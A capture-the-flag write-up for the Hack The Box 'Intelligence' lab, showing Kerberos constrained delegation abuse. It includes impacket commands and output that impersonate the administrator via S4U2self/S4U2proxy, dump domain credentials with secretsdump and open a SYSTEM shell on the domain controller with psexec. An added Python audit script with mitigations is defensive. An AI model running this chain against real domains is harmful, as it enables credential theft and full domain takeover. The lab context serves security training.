Kerberos Constrained Delegation (KCD) Attack
Referring to the earlier domain assessment with BloodHound, the `svc_int$` account is allowed to delegate to the `WWW/dc.intelligence.htb` SPN.
Now that I have [[Intelligence_Lateral_Movement_svc_int#validation|compromised]] the `svc_int` account, I can attempt to exploit this delegation.
┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ KRB5CCNAME=svc_int\$@dc.intelligence.htb.ccache powerview 'INTELLIGENCE.HTB/@dc.intelligence.htb' --no-pass -k --dc-ip $IP -q 'Get-DomainObject svc_int$' | grep -i delegate
[2023-09-27 08:42:25] LDAP Signing NOT Enforced!
msds-allowedtodelegateto : WWW/dc.intelligence.htb
The delegation could also be checked with PowerView by looking further into the `svc_int$` “object”.
┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ KRB5CCNAME=svc_int\$@dc.intelligence.htb.ccache impacket-findDelegation 'intelligence.htb/svc_int$' -k -no-pass -dc-ip $IP -dc-host dc.intelligence.htb
Impacket v0.11.0 - Copyright 2023 Fortra
AccountName AccountType DelegationType DelegationRightsTo
----------- ----------------------------------- ---------------------------------- -----------------------
svc_int$ ms-DS-Group-Managed-Service-Account Constrained w/ Protocol Transition WWW/dc.intelligence.htb
`impacket-findDelegation` additionally shows the delegation type: Constrained w/ Protocol Transition.
This would mean that I could just perform a Kerberos Constrained Delegation attack.
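How the delegation type reported above follows from directory data, as an added example (not part of the original writeup and not Impacket's code): it classifies accounts from `userAccountControl` and `msDS-AllowedToDelegateTo`, flags delegation that reaches a domain controller, and lists privileged accounts that remain delegatable. The sample entries, the `svc_web` account, the UAC values and the severity labels are constructed for illustration.

```python
from dataclasses import dataclass, field, replace

# userAccountControl bits, as documented by Microsoft
SERVER_TRUST_ACCOUNT = 0x2000                # domain controller computer account
TRUSTED_FOR_DELEGATION = 0x80000             # unconstrained delegation
NOT_DELEGATED = 0x100000                     # "Account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # protocol transition allowed

PROTO = "Constrained w/ Protocol Transition"  # label as it appears on this page
KERB_ONLY = "Constrained (Kerberos only)"     # label chosen for this example
UNCONSTRAINED = "Unconstrained"


@dataclass
class Entry:
    sam: str                                  # sAMAccountName
    uac: int                                  # userAccountControl
    allowed_to_delegate_to: list = field(default_factory=list)  # msDS-AllowedToDelegateTo
    dns_host_name: str = ""                   # dNSHostName
    admin_count: int = 0                      # adminCount
    protected_users: bool = False             # member of Protected Users


@dataclass
class Finding:
    account: str
    delegation: str
    severity: str                             # "critical" / "high" / "review" (this example's scale)
    dc_targets: list


def delegation_type(e):
    """Derive the delegation type from the UAC bits and the SPN list."""
    if e.uac & TRUSTED_FOR_DELEGATION:
        return UNCONSTRAINED
    if e.allowed_to_delegate_to:
        return PROTO if e.uac & TRUSTED_TO_AUTH_FOR_DELEGATION else KERB_ONLY
    return None


def spn_host(spn):
    """Host part of class/host[:port][/name], lower-cased."""
    parts = spn.split("/")
    return parts[1].split(":")[0].lower() if len(parts) > 1 else ""


def audit(entries):
    """Return a Finding for every non-DC account that is trusted for delegation."""
    dc_hosts = set()
    for e in entries:
        if e.uac & SERVER_TRUST_ACCOUNT and e.dns_host_name:
            fqdn = e.dns_host_name.lower()
            dc_hosts.update({fqdn, fqdn.split(".")[0]})
    findings = []
    for e in entries:
        if e.uac & SERVER_TRUST_ACCOUNT:
            continue  # DCs carry TRUSTED_FOR_DELEGATION by default
        dtype = delegation_type(e)
        if dtype is None:
            continue
        # Match on the SPN's host, not its service class: on this page the ticket
        # requested for WWW/... is then used by secretsdump and psexec on that host.
        dc_targets = sorted(s for s in e.allowed_to_delegate_to if spn_host(s) in dc_hosts)
        if dtype == UNCONSTRAINED or (dtype == PROTO and dc_targets):
            severity = "critical"
        elif dc_targets:
            severity = "high"
        else:
            severity = "review"
        findings.append(Finding(e.sam, dtype, severity, dc_targets))
    return findings


def impersonable_privileged(entries):
    """Privileged accounts a delegating service may still act on behalf of."""
    return sorted(e.sam for e in entries
                  if e.admin_count and not (e.uac & NOT_DELEGATED) and not e.protected_users)


def harden(e):
    """Mitigation: mark the account as sensitive so it cannot be delegated."""
    return replace(e, uac=e.uac | NOT_DELEGATED)


# Constructed sample directory entries (names from the page except svc_web).
SAMPLE = [
    Entry("dc$", 0x82000, dns_host_name="dc.intelligence.htb"),
    Entry("svc_int$", 0x1001000, ["WWW/dc.intelligence.htb"]),
    Entry("svc_web", 0x200, ["HTTP/web01.intelligence.htb:8080"]),  # hypothetical account
    Entry("administrator", 0x10200, admin_count=1),
]

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"{f.account:10} {f.delegation:36} {f.severity:8} {f.dc_targets}")
    print("delegatable privileged accounts:", impersonable_privileged(SAMPLE))
```

Setting `NOT_DELEGATED` on privileged accounts (or adding them to Protected Users) empties the second list; removing the DC-hosted SPN from `msDS-AllowedToDelegateTo` clears the critical finding.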
full s4u2 (self + proxy)
┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ KRB5CCNAME=svc_int\$@dc.intelligence.htb.ccache impacket-getST 'intelligence.htb/svc_int$' -k -no-pass -spn 'WWW/dc.intelligence.htb' -impersonate administrator -dc-ip $IP -debug
Impacket v0.11.0 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /home/kali/.local/lib/python3.11/site-packages/impacket
[+] Using Kerberos Cache: svc_int$@dc.intelligence.htb.ccache
[+] Returning cached credential for KRBTGT/INTELLIGENCE.HTB@INTELLIGENCE.HTB
[+] Using TGT from cache
[+] Username retrieved from CCache: svc_int$
[*] Impersonating administrator
[+] AUTHENTICATOR
Authenticator:
authenticator-vno=5
crealm=INTELLIGENCE.HTB
cname=PrincipalName:
name-type=1
name-string=SequenceOf:
svc_int$
cusec=78988
ctime=20230927065734Z
[+] S4UByteArray
0000 01 00 00 00 61 64 6D 69 6E 69 73 74 72 61 74 6F ....administrato
0010 72 69 6E 74 65 6C 6C 69 67 65 6E 63 65 2E 68 74 rintelligence.ht
0020 62 4B 65 72 62 65 72 6F 73 bKerberos
[+] CheckSum
0000 7B 34 F9 84 52 3E 32 F2 F7 55 52 AB AF 4C 79 D4 {4..R>2..UR..Ly.
[+] PA_FOR_USER_ENC
PA_FOR_USER_ENC:
userName=PrincipalName:
name-type=1
name-string=SequenceOf:
administrator
userRealm=intelligence.htb
cksum=Checksum:
cksumtype=-138
checksum=0x7b34f984523e32f2f75552abaf4c79d4
auth-package=Kerberos
[+] Final TGS
TGS_REQ:
pvno=5
msg-type=12
padata=SequenceOf:
PA_DATA:
padata-type=1
PA_DATA:
padata-type=129
padata-value=0x305aa01a3018a003020101a111300f1b0d61646d696e6973747261746f72a1121b10696e74656c6c6967656e63652e687462a21c301aa0040202ff76a11204107b34f984523e32f2f75552abaf4c79d4a30a1b084b65726265726f73
req-body=KDC_REQ_BODY:
kdc-options=1082195968
realm=INTELLIGENCE.HTB
sname=PrincipalName:
name-type=0
name-string=SequenceOf:
svc_int$
till=20230928065734Z
nonce=721618508
etype=SequenceOf:
18 23
[*] Requesting S4U2self
[+] Trying to connect to KDC at 10.10.10.248:88
[+] TGS_REP
TGS_REP:
pvno=5
msg-type=13
crealm=intelligence.htb
cname=PrincipalName:
name-type=1
name-string=SequenceOf:
administrator
ticket=Ticket:
tkt-vno=5
realm=INTELLIGENCE.HTB
sname=PrincipalName:
name-type=0
name-string=SequenceOf:
svc_int$
enc-part=EncryptedData:
etype=18
kvno=4
enc-part=EncryptedData:
etype=18
[*] Requesting S4U2Proxy
[+] Trying to connect to KDC at 10.10.10.248:88
[*] Saving ticket in administrator.ccache
Impersonating the `administrator` user from the `svc_int$` account, leveraging the delegation to the `WWW/dc.intelligence.htb` SPN set in the `msDS-AllowedToDelegateTo` attribute of the `svc_int$` account.
The obtained TGT of the `administrator` user would allow me to perform any action as the user.
Hashdump
┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ KRB5CCNAME=administrator.ccache impacket-secretsdump intelligence.htb/@dc.intelligence.htb -no-pass -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] target system bootkey: 0xcae14f646af6326ace0e1f5b8b4146df
[*] dumping local sam hashes (uid:rid:lmhash:nthash)
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] dumping domain credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Domain Level Compromise
Shell Drop
┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ KRB5CCNAME=administrator.ccache impacket-psexec intelligence.htb/@dc.intelligence.htb -no-pass -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on dc.intelligence.htb.....
[*] Found writable share ADMIN$
[*] Uploading file yRvvqZpC.exe
[*] Opening SVCManager on dc.intelligence.htb.....
[*] Creating service POIz on dc.intelligence.htb.....
[*] Starting service POIz.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1879]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
dc
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::23b
IPv6 Address. . . . . . . . . . . : dead:beef::95e:6ab2:ad09:42c7
Link-local IPv6 Address . . . . . : fe80::95e:6ab2:ad09:42c7%6
IPv4 Address. . . . . . . . . . . : 10.10.10.248
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%6
10.10.10.2
System Level Compromise